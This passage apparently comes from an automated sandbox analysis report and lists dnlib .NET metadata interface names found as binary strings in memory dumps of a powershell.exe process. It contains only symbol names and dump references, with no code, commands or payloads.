Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1625573790.00007FF886E80000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1625573790.00007FF886E80000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
